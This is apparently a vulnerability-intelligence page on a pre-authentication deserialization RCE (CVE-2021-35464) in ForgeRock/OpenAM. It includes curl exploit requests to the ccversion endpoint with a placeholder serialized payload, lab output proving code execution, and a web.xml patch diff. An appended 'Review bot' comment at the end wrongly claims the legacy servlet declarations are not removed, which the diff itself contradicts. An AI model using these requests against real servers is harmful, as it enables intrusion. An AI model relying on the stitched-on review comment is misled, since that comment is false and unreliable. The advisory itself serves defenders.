Pre-auth RCE in ForgeRock Access Manager (CVE-2021-35464)
Description
ForgeRock AM server before 7.0 has a Java deserialization vulnerability in the jato.pageSession parameter on multiple pages. The exploitation does not require authentication, and remote code execution can be triggered by sending a single crafted /ccversion/* request to the server. The vulnerability exists due to the usage of Sun ONE Application Framework (JATO) found in versions of Java 8 or earlier.
Ratings
- Attacker Value: Very High
- Exploitability: Very High
Technical Analysis
Trivial RCE with a one-line request. Rapid7 Labs is seeing this product in quite a few large enterprises—patch quickly. Shout-out to Portswigger for their excellent write-up: https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464
Update July 12, 2021: We now have reliable private reports of exploitation in the wild.
General Information
Vendors
- forgerock
Products
- am
- openam
Exploited in the Wild
- Government or Industry Alert (https://www.cyber.gov.au/acsc/view-all-content/alerts/forgerock-open-am-critical-vulnerability)
- News Article or Blog (https://threatpost.com/critical-vulnerability-rce-forgerock-openam/167679/)
Additional Info
Technical Analysis
Threat status: Threat – we now have reliable private reports of exploitation in the wild.
Attacker utility: Remote code execution
Vulnerability class: Deserialization
Description
On Tuesday, June 29, 2021, Portswigger security researcher Michael Stepankin published details on CVE-2021-35464, a pre-authentication remote code execution vulnerability in ForgeRock’s AM identity and access management solution. The vulnerability arises from a Java deserialization flaw in AM’s implementation of the JATO framework and can be triggered by a simple one-line GET or POST request to a vulnerable endpoint. Successful exploitation yields code execution on the target system, and public proofs-of-concept are readily available.
ForgeRock AM versions below 7.0 running on Java 8 are vulnerable and the weakness also exists in unpatched versions of the Open Identity Platform’s OpenAM. ForgeRock/OIP installations running on Java 9 or higher are unaffected.
Affected products
- AM 6.0.0.x
- AM 6.5.0.x
- AM 6.5.1
- AM 6.5.2.x
- AM 6.5.3
Guidance
According to the guidance in ForgeRock’s advisory, they are “actively working on patches” for existing versions of ForgeRock Access Manager as of June 29, 2021. Organizations must either upgrade to AM version 7 or above or apply one of several workarounds available—see the advisory for details.
Rapid7 analysis
We expect widespread exploitation to occur quickly. As of June 29, 2021, Rapid7 Labs has been able to identify just over 1,000 internet-facing systems that appear to be using ForgeRock’s AM solution. Rapid7 researchers could easily reproduce RCE against OpenAM using a touch /tmp/vulnerable payload:
```
wvu@kharak:~$ curl -v "http://127.0.0.1:7080/openam/oauth2/..;/ccversion/Version?jato.pageSession=<serialized_object>"
*   Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 7080 (#0)
> GET /openam/oauth2/..;/ccversion/Version?jato.pageSession=<serialized_object> HTTP/1.1
> Host: 127.0.0.1:7080
> User-Agent: curl/7.64.1
> Accept: */*
>
< HTTP/1.1 302
< X-Frame-Options: SAMEORIGIN
< Cache-Control: private
< Location: http://127.0.0.1:7080/openam/base/AMInvalidURL
< Content-Length: 0
< Date: Tue, 29 Jun 2021 15:59:35 GMT
<
* Connection #0 to host 127.0.0.1 left intact
* Closing connection 0
wvu@kharak:~$
```

```
openam@localhost:/tmp$ ls -l
total 8
drwxr-x--- 2 openam root 4096 Jun 29 15:50 hsperfdata_openam
drwxr-xr-x 1 root   root 4096 Jun 17 00:46 hsperfdata_root
-rw-r----- 1 openam root    0 Jun 29 15:59 vulnerable
openam@localhost:/tmp$
```
Sending the payload in a POST request also works:

```
curl -v "http://127.0.0.1:7080/openam/oauth2/..;/ccversion/Version" -d jato.pageSession=<serialized_object>
```
The ForgeRock AM “patch” (version 7) removes JATO and the legacy endpoints using it:
--- a/WEB-INF/web.xml +++ b/WEB-INF/web.xml 
@@ -45,88 +45,6 @@ <listener-class>org.forgerock.openam.identity.idm.AMIdentityRepositoryListenerInitializer</listener-class> </listener> - <!-- context param --> - <context-param> - <param-name>jato:enforceStrictSessionTimeout</param-name> - <param-value>true</param-value> - </context-param> - <context-param> - <param-name>jato:com.sun.identity.authentication.UI.*:moduleURL</param-name> - <param-value>../UI</param-value> - </context-param> - <context-param> - <param-name>jato:enforceStrictSessionTimeout1</param-name> - <param-value>true</param-value> - </context-param> - - <!-- Console context params --> - <context-param> - <param-name>jato:com.sun.identity.console.base.*:moduleURL</param-name> - <param-value>../base</param-value> - </context-param> - <context-param> - <param-name>jato:com.sun.identity.console.authentication.*:moduleURL</param-name> - <param-value>../authentication</param-value> - </context-param> - <context-param> - <param-name>jato:com.sun.identity.console.service.*:moduleURL</param-name> - <param-value>../service</param-value> - </context-param> - <context-param> - <param-name>jato:com.sun.identity.console.session.*:moduleURL</param-name> - <param-value>../session</param-value> - </context-param> - <context-param> - <param-name>jato:com.sun.identity.console.realm.*:moduleURL</param-name> - <param-value>../realm</param-value> - </context-param> - <context-param> - <param-name>jato:com.sun.identity.console.policy.*:moduleURL</param-name> - <param-value>../policy</param-value> - </context-param> - <context-param> - <param-name>jato:com.sun.identity.console.idm.*:moduleURL</param-name> - <param-value>../idm</param-value> - </context-param> - <context-param> - <param-name>jato:com.sun.identity.console.user.*:moduleURL</param-name> - <param-value>../user</param-value> - </context-param> - <context-param> - <param-name>jato:com.sun.identity.console.delegation.*:moduleURL</param-name> - <param-value>../delegation</param-value> - </context-param> - 
<context-param> - <param-name>jato:com.sun.identity.console.agentconfig.*:moduleURL</param-name> - <param-value>../agentconfig</param-value> - </context-param> - <context-param> - <param-name>jato:com.sun.identity.console.task.*:moduleURL</param-name> - <param-value>../task</param-value> - </context-param> - <context-param> - <param-name>jato:com.sun.identity.console.version.*:moduleURL</param-name> - <param-value>../ccversion</param-value> - </context-param> - <context-param> - <param-name>jato:com.sun.identity.console.federation.*:moduleURL</param-name> - <param-value>../federation</param-value> - </context-param> - <context-param> - <param-name>jato:com.sun.identity.console.webservices.*:moduleURL</param-name> - <param-value>../webservices</param-value> - </context-param> - <context-param> - <param-name>jato:com.sun.identity.console.sts.*:moduleURL</param-name> - <param-value>../sts</param-value> - </context-param> - <context-param> - <param-name>jato:com.sun.identity.console.audit.*:moduleURL</param-name> - <param-value>../audit</param-value> - </context-param> - - <!-- end console context param --> - <filter> <filter-name>amSetupFilter</filter-name> <filter-class>com.sun.identity.setup.AMSetupFilter</filter-class> @@ -141,6 +59,16 @@ <param-value>Server</param-value> </init-param> </filter> + <filter> + <filter-name>SecureCookieFilter</filter-name> + <filter-class>org.forgerock.openam.headers.SecureCookieFilter</filter-class> + <async-supported>true</async-supported> + <init-param> + <!-- Add any cookies that should be excluded from upgrade to secure cookies here --> + <param-name>excludes</param-name> + <param-value></param-value> + </init-param> + </filter> <!-- To override the default User-Agent exclusion patterns for SameSite=none cookies, uncomment the following filter definition and update the excluded patterns, one pattern per line --> 
@@ -191,6 +119,18 @@ <param-value>nosniff</param-value> </init-param> </filter> + <filter> + <filter-name>CachePrivate</filter-name> + <filter-class>org.forgerock.openam.headers.SetHeadersFilter</filter-class> + <init-param> + <param-name>Cache-Control</param-name> + <param-value>private</param-value> + </init-param> + <init-param> + <param-name>excludes</param-name> + <param-value>/serverinfo/*,/serverinfo/version,/serverinfo/cookieDomains</param-value> + </init-param> + </filter> <filter> <filter-name>CacheForFiveMinutes</filter-name> <filter-class>org.forgerock.openam.headers.SetHeadersFilter</filter-class> 
@@ -210,73 +150,9 @@ </init-param> <init-param> <param-name>excludes</param-name> - <param-value>/policyEditor/,/policyEditor/index.html,/scripts/,/scripts/index.html,/XUI/,/XUI/index.html</param-value> + <param-value>/XUI/,/XUI/index.html,/ui-admin/,/ui-admin/index.html</param-value> </init-param> </filter> - <!-- To configure CORS Support, please see the documentation and use the following lines as a template. - <filter> - <filter-name>CORSFilter</filter-name> - <filter-class>org.forgerock.openam.cors.CORSFilter</filter-class> - <init-param> - <description> - Accepted Methods (Required): - A comma separated list of HTTP methods for which to accept CORS requests. - </description> - <param-name>methods</param-name> - <param-value>POST,PUT</param-value> - </init-param> - <init-param> - <description> - Accepted Origins (Required): - A comma separated list of origins from which to accept CORS requests. - </description> - <param-name>origins</param-name> - <param-value>http://www.example.net,https://example.org:8433</param-value> - </init-param> - <init-param> - <description> - Allow Credentials (Optional): - Whether to include the Vary (Origin) and Access-Control-Allow-Credentials headers in the response. - Default: false - </description> - <param-name>allowCredentials</param-name> - <param-value>false</param-value> - </init-param> - <init-param> - <description> - Allowed Headers (Optional): - A comma separated list of HTTP headers which can be included in the requests. - </description> - <param-name>headers</param-name> - <param-value>headerOne,headerTwo,headerThree</param-value> - </init-param> - <init-param> - <description> - Expected Hostname (Optional): - The name of the host expected in the request Host header. 
- </description> - <param-name>expectedHostname</param-name> - <param-value>openam.example.com:8080</param-value> - </init-param> - <init-param> - <description> - Exposed Headers (Optional): - The comma separated list of headers which the user-agent can expose to its CORS client. - </description> - <param-name>exposeHeaders</param-name> - <param-value>exposeHeaderOne,exposeHeaderTwo</param-value> - </init-param> - <init-param> - <description> - Maximum Cache Age (Optional): - The maximum time that the CORS client can cache the pre-flight response, in seconds. - Default: 600 - </description> - <param-name>maxAge</param-name> - <param-value>600</param-value> - </init-param> - </filter> - --> <filter> <filter-name>AuditContextFilter</filter-name> <filter-class>org.forgerock.openam.audit.context.AuditContextFilter</filter-class> @@ -308,9 +184,9 @@ <url-pattern>/*</url-pattern> </filter-mapping> - <!-- Access audit filter for JATO, Debug.jsp and ssoadm.jsp pages --> + <!-- Access audit filter for Debug.jsp and ssoadm.jsp pages --> <filter> - <filter-name>JatoAuditFilter</filter-name> + <filter-name>DebugAuditFilter</filter-name> <filter-class>org.forgerock.openam.audit.servlet.AuditAccessServletFilter</filter-class> <init-param> <param-name>auditing-component</param-name> 
@@ -318,36 +194,12 @@ </init-param> </filter> <filter-mapping> - <filter-name>JatoAuditFilter</filter-name> - <url-pattern>/service/*</url-pattern> - </filter-mapping> - <filter-mapping> - <filter-name>JatoAuditFilter</filter-name> - <url-pattern>/federation/*</url-pattern> - </filter-mapping> - <filter-mapping> - <filter-name>JatoAuditFilter</filter-name> - <url-pattern>/realm/*</url-pattern> - </filter-mapping> - <filter-mapping> - <filter-name>JatoAuditFilter</filter-name> - <url-pattern>/agentconfig/*</url-pattern> - </filter-mapping> - <filter-mapping> - <filter-name>JatoAuditFilter</filter-name> - <url-pattern>/sts/*</url-pattern> - </filter-mapping> - <filter-mapping> - <filter-name>JatoAuditFilter</filter-name> - <url-pattern>/delegation/*</url-pattern> + <filter-name>DebugAuditFilter</filter-name> + <url-pattern>/Debug.jsp</url-pattern> </filter-mapping> <filter-mapping> - <filter-name>JatoAuditFilter</filter-name> - <url-pattern>/idm/*</url-pattern> - </filter-mapping> - <filter-mapping> - <filter-name>JatoAuditFilter</filter-name> - <url-pattern>/Debug.jsp</url-pattern> + <filter-name>DebugAuditFilter</filter-name> + <url-pattern>/Logback.jsp</url-pattern> </filter-mapping> <filter> <filter-name>SsoAdmJspAuditFilter</filter-name> @@ -366,15 +218,13 @@ <filter-name>amSetupFilter</filter-name> <url-pattern>/*</url-pattern> </filter-mapping> - <!-- <filter-mapping> - <filter-name>CORSFilter</filter-name> - <url-pattern>/json/*</url-pattern> + <filter-name>FQDNValidationFilter</filter-name> + <url-pattern>/XUI/*</url-pattern> </filter-mapping> - --> <filter-mapping> <filter-name>FQDNValidationFilter</filter-name> - <url-pattern>/XUI/*</url-pattern> + <url-pattern>/ui-admin/*</url-pattern> </filter-mapping> <filter-mapping> <filter-name>FQDNValidationFilter</filter-name> 
@@ -402,14 +252,23 @@ <filter-name>NoSniffFilter</filter-name> <url-pattern>/*</url-pattern> </filter-mapping> + <filter-mapping> + <filter-name>CachePrivate</filter-name> + <url-pattern>/json/*</url-pattern> + </filter-mapping> <filter-mapping> <filter-name>ResponseValidationFilter</filter-name> <url-pattern>/*</url-pattern> </filter-mapping> <filter-mapping> + <!-- The DisableSameSiteCookiesFilter should always come before the SecureCookieFilter --> <filter-name>DisableSameSiteCookiesFilter</filter-name> <url-pattern>/*</url-pattern> </filter-mapping> + <filter-mapping> + <filter-name>SecureCookieFilter</filter-name> + <url-pattern>/*</url-pattern> + </filter-mapping> <filter-mapping> <filter-name>CacheForFiveMinutes</filter-name> <url-pattern>/XUI/index.html</url-pattern> @@ -420,6 +279,10 @@ <url-pattern>/ui-admin/*</url-pattern> <url-pattern>/XUI/*</url-pattern> </filter-mapping> + <filter-mapping> + <filter-name>CacheForFiveMinutes</filter-name> + <url-pattern>/ui-admin/index.html</url-pattern> + </filter-mapping> <filter-mapping> <filter-name>NotificationsWebSocketFilter</filter-name> <url-pattern>/notifications</url-pattern> @@ -445,10 +308,6 @@ <!-- listener declaration --> - <servlet> - <servlet-name>LoginServlet</servlet-name> - <servlet-class>com.sun.identity.authentication.UI.LoginServlet</servlet-class> - </servlet> <servlet> <servlet-name>setSetupProgress</servlet-name> <servlet-class>com.sun.identity.setup.SetSetupProgress</servlet-class> 
@@ -528,121 +387,6 @@ <servlet-class>com.sun.identity.configuration.MonitoringFedConfigurator</servlet-class> <load-on-startup>30</load-on-startup> </servlet> - <servlet> - <description>CDCServlet</description> - <servlet-name>cdcservlet</servlet-name> - <servlet-class>com.iplanet.services.cdc.CDCServlet</servlet-class> - </servlet> - <servlet> - <description>SAMLAwareServlet</description> - <servlet-name>SAMLAwareServlet</servlet-name> - <servlet-class>com.sun.identity.saml.servlet.SAMLAwareServlet</servlet-class> - </servlet> - <servlet> - <description>SAMLPOSTProfileServlet</description> - <servlet-name>SAMLPOSTProfileServlet</servlet-name> - <servlet-class>com.sun.identity.saml.servlet.SAMLPOSTProfileServlet</servlet-class> - </servlet> - <servlet> - <description>SAMLSOAPReceiver</description> - <servlet-name>SAMLSOAPReceiver</servlet-name> - <servlet-class>com.sun.identity.saml.servlet.SAMLSOAPReceiver</servlet-class> - </servlet> - <servlet> - <description>AssertionManagerServlet</description> - <servlet-name>AssertionManagerServlet</servlet-name> - <servlet-class>com.sun.identity.saml.servlet.AssertionManagerServlet</servlet-class> - </servlet> - <servlet> - <description>FSAssertionManagerServlet</description> - <servlet-name>FSAssertionManagerServlet</servlet-name> - <servlet-class>com.sun.identity.federation.services.FSAssertionManagerServlet</servlet-class> - </servlet> - <servlet> - <description>SecurityTokenManagerServlet</description> - <servlet-name>SecurityTokenManagerServlet</servlet-name> - <servlet-class>com.sun.identity.liberty.ws.security.SecurityTokenManagerServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>preLoginHandler</servlet-name> - <servlet-class>com.sun.identity.federation.login.FSPreLoginHandler</servlet-class> - </servlet> - <servlet> - <servlet-name>postLoginHandler</servlet-name> - <servlet-class>com.sun.identity.federation.login.FSPostLoginHandler</servlet-class> - </servlet> - <servlet> - 
<servlet-name>ProcessLogout</servlet-name> - <servlet-class>com.sun.identity.federation.services.logout.FSProcessLogoutServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>ReturnLogout</servlet-name> - <servlet-class>com.sun.identity.federation.services.logout.FSReturnLogoutServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>SingleSignOnService</servlet-name> - <servlet-class>com.sun.identity.federation.services.fednsso.FSSSOAndFedService</servlet-class> - </servlet> - <servlet> - <servlet-name>IntersiteTransferService</servlet-name> - <servlet-class>com.sun.identity.federation.services.fednsso.FSIntersiteTransferService</servlet-class> - </servlet> - <servlet> - <servlet-name>AssertionConsumerService</servlet-name> - <servlet-class>com.sun.identity.federation.services.fednsso.FSAssertionConsumerService</servlet-class> - </servlet> - <servlet> - <servlet-name>SOAPReceiver</servlet-name> - <servlet-class>com.sun.identity.federation.services.FSSOAPReceiver</servlet-class> - </servlet> - <servlet> - <servlet-name>FederationTerminationServlet</servlet-name> - <servlet-class>com.sun.identity.federation.services.termination.FSTerminationInitiationServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>ProcessTermination</servlet-name> - <servlet-class>com.sun.identity.federation.services.termination.FSTerminationRequestServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>ReturnTermination</servlet-name> - <servlet-class>com.sun.identity.federation.services.termination.FSTerminationReturnServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>InitiateRegistration</servlet-name> - <servlet-class>com.sun.identity.federation.services.registration.FSRegistrationInitiationServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>ProcessRegistration</servlet-name> - <servlet-class>com.sun.identity.federation.services.registration.FSRegistrationRequestServlet</servlet-class> - </servlet> - <servlet> - 
<servlet-name>ReturnRegistration</servlet-name> - <servlet-class>com.sun.identity.federation.services.registration.FSRegistrationReturnServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>LogoutServlet</servlet-name> - <servlet-class>com.sun.identity.federation.services.logout.FSSingleLogoutServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>WSSOAPReceiver</servlet-name> - <servlet-class>com.sun.identity.liberty.ws.soapbinding.SOAPReceiver</servlet-class> - </servlet> - <servlet> - <servlet-name>WSPRedirectHandler</servlet-name> - <servlet-class>com.sun.identity.liberty.ws.interaction.WSPRedirectHandlerServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>IDPFinderService</servlet-name> - <servlet-class>com.sun.identity.federation.services.fednsso.FSIDPFinderService</servlet-class> - </servlet> - <servlet> - <servlet-name>idffwriter</servlet-name> - <servlet-class>com.sun.identity.saml2.idpdiscovery.CookieWriterServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>idffreader</servlet-name> - <servlet-class>com.sun.identity.saml2.idpdiscovery.CookieReaderServlet</servlet-class> - </servlet> <servlet> <servlet-name>saml2writer</servlet-name> <servlet-class>com.sun.identity.saml2.idpdiscovery.CookieWriterServlet</servlet-class> @@ -814,10 +558,6 @@ <servlet-name>LoginLogoutMapping</servlet-name> <url-pattern>/logout</url-pattern> </servlet-mapping> - <servlet-mapping> - <servlet-name>LoginServlet</servlet-name> - <url-pattern>/UI/*</url-pattern> - </servlet-mapping> <servlet-mapping> <servlet-name>AMSetupServlet</servlet-name> <url-pattern>/config/configurator</url-pattern> 
@@ -1025,114 +765,6 @@ <servlet-name>spsaehandler</servlet-name> <url-pattern>/spsaehandler/*</url-pattern> </servlet-mapping> - <servlet-mapping> - <servlet-name>IDPFinderService</servlet-name> - <url-pattern>/idpfinder</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>cdcservlet</servlet-name> - <url-pattern>/cdcservlet</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>SAMLAwareServlet</servlet-name> - <url-pattern>/SAMLAwareServlet</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>SAMLPOSTProfileServlet</servlet-name> - <url-pattern>/SAMLPOSTProfileServlet</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>SAMLSOAPReceiver</servlet-name> - <url-pattern>/SAMLSOAPReceiver</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>AssertionManagerServlet</servlet-name> - <url-pattern>/AssertionManagerServlet/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>FSAssertionManagerServlet</servlet-name> - <url-pattern>/FSAssertionManagerServlet/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>SecurityTokenManagerServlet</servlet-name> - <url-pattern>/SecurityTokenManagerServlet/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>preLoginHandler</servlet-name> - <url-pattern>/preLogin</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>postLoginHandler</servlet-name> - <url-pattern>/postLogin/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>ProcessLogout</servlet-name> - <url-pattern>/ProcessLogout/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>ReturnLogout</servlet-name> - <url-pattern>/ReturnLogout/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>LogoutServlet</servlet-name> - <url-pattern>/liberty-logout</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>SingleSignOnService</servlet-name> - 
<url-pattern>/SingleSignOnService/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>IntersiteTransferService</servlet-name> - <url-pattern>/IntersiteTransferService</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>AssertionConsumerService</servlet-name> - <url-pattern>/AssertionConsumerService/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>SOAPReceiver</servlet-name> - <url-pattern>/SOAPReceiver/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>FederationTerminationServlet</servlet-name> - <url-pattern>/federation-terminate</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>ProcessTermination</servlet-name> - <url-pattern>/ProcessTermination/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>ReturnTermination</servlet-name> - <url-pattern>/ReturnTermination/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>InitiateRegistration</servlet-name> - <url-pattern>/InitiateRegistration</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>ProcessRegistration</servlet-name> - <url-pattern>/ProcessRegistration/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>ReturnRegistration</servlet-name> - <url-pattern>/ReturnRegistration/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>WSSOAPReceiver</servlet-name> - <url-pattern>/Liberty/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>WSPRedirectHandler</servlet-name> - <url-pattern>/WSPRedirectHandler/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>idffwriter</servlet-name> - <url-pattern>/idffwriter</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>idffreader</servlet-name> - <url-pattern>/idffreader</url-pattern> - </servlet-mapping> <servlet-mapping> <servlet-name>saml2writer</servlet-name> <url-pattern>/saml2writer</url-pattern> 
@@ -1164,30 +796,6 @@ <!-- end of servlet mapping --> - <servlet> - <servlet-name>WebFinger</servlet-name> - <servlet-class>org.restlet.ext.servlet.ServerServlet</servlet-class> - - <!-- Your application class name (Optional - For mode 3) --> - <init-param> - <param-name>org.restlet.application</param-name> - <param-value>org.forgerock.openidconnect.restlet.WebFinger</param-value> - </init-param> - - <!-- List of supported client protocols (Optional - Only in mode 3) --> - <init-param> - <param-name>org.restlet.clients</param-name> - <param-value>RIAP CLAP</param-value> - </init-param> - - <!-- Add the Servlet context path to routes (Optional) --> - <init-param> - <param-name>org.restlet.autoWire</param-name> - <param-value>true</param-value> - </init-param> - - </servlet> - <servlet> <servlet-name>OAuth2RegisterClient</servlet-name> <jsp-file>/oauth2/registerClient.jsp</jsp-file> @@ -1200,14 +808,9 @@ <!-- servlet declaration --> - <servlet-mapping> - <servlet-name>WebFinger</servlet-name> - <url-pattern>/.well-known/*</url-pattern> - </servlet-mapping> - <servlet> <servlet-name>OpenAM</servlet-name> - <servlet-class>org.forgerock.http.servlet.HttpFrameworkServlet</servlet-class> + <servlet-class>org.forgerock.openam.http.OpenAMHttpFrameworkServlet</servlet-class> <init-param> <param-name>application-loader</param-name> <param-value>guice</param-value> 
@@ -1238,90 +841,22 @@ <servlet-name>OpenAM</servlet-name> <url-pattern>/sts-tokengen/*</url-pattern> </servlet-mapping> - - <!-- Console --> - <servlet-mapping> - <servlet-name>AuthServlet</servlet-name> - <url-pattern>/authentication/*</url-pattern> - </servlet-mapping> <servlet-mapping> - <servlet-name>AMBaseServlet</servlet-name> - <url-pattern>/base/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>SCServlet</servlet-name> - <url-pattern>/service/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>SMServlet</servlet-name> - <url-pattern>/session/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>RMServlet</servlet-name> - <url-pattern>/realm/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>PMServlet</servlet-name> - <url-pattern>/policy/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>IDMServlet</servlet-name> - <url-pattern>/idm/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>UMServlet</servlet-name> - <url-pattern>/user/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>DelegationServlet</servlet-name> - <url-pattern>/delegation/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>TaskServlet</servlet-name> - <url-pattern>/task/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>AgentConfigurationServlet</servlet-name> - <url-pattern>/agentconfig/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>VersionServlet</servlet-name> - <url-pattern>/ccversion/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>FSServlet</servlet-name> - <url-pattern>/federation/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>WSServlet</servlet-name> - <url-pattern>/webservices/*</url-pattern> - </servlet-mapping> - <servlet-mapping> - <servlet-name>STSServlet</servlet-name> - <url-pattern>/sts/*</url-pattern> - 
</servlet-mapping> - <servlet-mapping> - <servlet-name>AuditServlet</servlet-name> - <url-pattern>/audit/*</url-pattern> - </servlet-mapping> - <!-- End console --> - - <servlet> - <servlet-name>ForgeRockRest</servlet-name> - <servlet-class>org.forgerock.openam.rest.RestEndpointServlet</servlet-class> - </servlet> - <servlet-mapping> - <servlet-name>ForgeRockRest</servlet-name> + <servlet-name>OpenAM</servlet-name> <url-pattern>/xacml/*</url-pattern> </servlet-mapping> <servlet-mapping> - <servlet-name>ForgeRockRest</servlet-name> + <servlet-name>OpenAM</servlet-name> <url-pattern>/oauth2/*</url-pattern> </servlet-mapping> <servlet-mapping> - <servlet-name>ForgeRockRest</servlet-name> + <servlet-name>OpenAM</servlet-name> <url-pattern>/uma/*</url-pattern> </servlet-mapping> + <servlet-mapping> + <servlet-name>OpenAM</servlet-name> + <url-pattern>/.well-known/*</url-pattern> + </servlet-mapping> <!-- Setup favicon.ico extension type --> <mime-mapping> 
@@ -1335,106 +870,6 @@ </welcome-file> </welcome-file-list> - <!-- The taglib is only specified once --> - <jsp-config> - <taglib> - <taglib-uri>/WEB-INF/jato.tld</taglib-uri> - <taglib-location>/WEB-INF/jato.tld</taglib-location> - </taglib> - <taglib> - <taglib-uri>/WEB-INF/cc.tld</taglib-uri> - <taglib-location>/WEB-INF/com_sun_web_ui/cc.tld</taglib-location> - </taglib> - - <!-- workarounds for lockart 2.x --> - <taglib> - <taglib-uri>/WEB-INF/tld/com_iplanet_jato/jato.tld</taglib-uri> - <taglib-location>/WEB-INF/jato.tld</taglib-location> - </taglib> - <taglib> - <taglib-uri>/WEB-INF/tld/com_sun_web_ui/cc.tld</taglib-uri> - <taglib-location>/WEB-INF/com_sun_web_ui/cc.tld</taglib-location> - </taglib> - <!-- taglib definition --> - </jsp-config> - <!-- comment it out due to issue 4891 in WAS/JBOSS/Geronimo - <resource-ref> - <description>mysql db idrepo</description> - <res-ref-name>jdbc/openssousersdb</res-ref-name> - <res-type>javax.sql.DataSource</res-type> - <res-auth>Container</res-auth> - <res-sharing-scope>Shareable</res-sharing-scope> - </resource-ref> - --> - - <!-- Console --> - <servlet> - <servlet-name>UMServlet</servlet-name> - <servlet-class>com.sun.identity.console.user.UMServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>AuthServlet</servlet-name> - <servlet-class>com.sun.identity.console.authentication.AuthServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>AMBaseServlet</servlet-name> - <servlet-class>com.sun.identity.console.base.AMBaseServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>SCServlet</servlet-name> - <servlet-class>com.sun.identity.console.service.SCServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>SMServlet</servlet-name> - <servlet-class>com.sun.identity.console.session.SMServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>RMServlet</servlet-name> - <servlet-class>com.sun.identity.console.realm.RMServlet</servlet-class> - </servlet> - <servlet> - 
<servlet-name>PMServlet</servlet-name> - <servlet-class>com.sun.identity.console.policy.PMServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>IDMServlet</servlet-name> - <servlet-class>com.sun.identity.console.idm.IDMServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>DelegationServlet</servlet-name> - <servlet-class>com.sun.identity.console.delegation.DelegationServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>AgentConfigurationServlet</servlet-name> - <servlet-class>com.sun.identity.console.agentconfig.AgentConfigurationServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>TaskServlet</servlet-name> - <servlet-class>com.sun.identity.console.task.TaskServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>VersionServlet</servlet-name> - <servlet-class>com.sun.identity.console.version.VersionServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>FSServlet</servlet-name> - <servlet-class>com.sun.identity.console.federation.FSServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>WSServlet</servlet-name> - <servlet-class>com.sun.identity.console.webservices.WSServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>STSServlet</servlet-name> - <servlet-class>com.sun.identity.console.sts.STSServlet</servlet-class> - </servlet> - <servlet> - <servlet-name>AuditServlet</servlet-name> - <servlet-class>com.sun.identity.console.audit.AuditServlet</servlet-class> - </servlet> - - <!-- End console --> - <!-- Start errors --> <error-page> <error-code>404</error-code>
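Review bot: the `@@ -1025,114 +765,6 @@` hunk drops the `<servlet-mapping>` entries for the legacy SAML 1.x and Liberty ID-FF endpoints (`cdcservlet`, `SAMLPOSTProfileServlet`, `/liberty-logout`, `/federation-terminate`, `/idffwriter` and the rest), but the matching `<servlet>` declarations for those names do not appear in any hunk shown; confirm they are removed in the same change, otherwise the container still instantiates those classes at startup with no route, and list the retired URLs in the release notes since agents and federation partners may still reference them.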
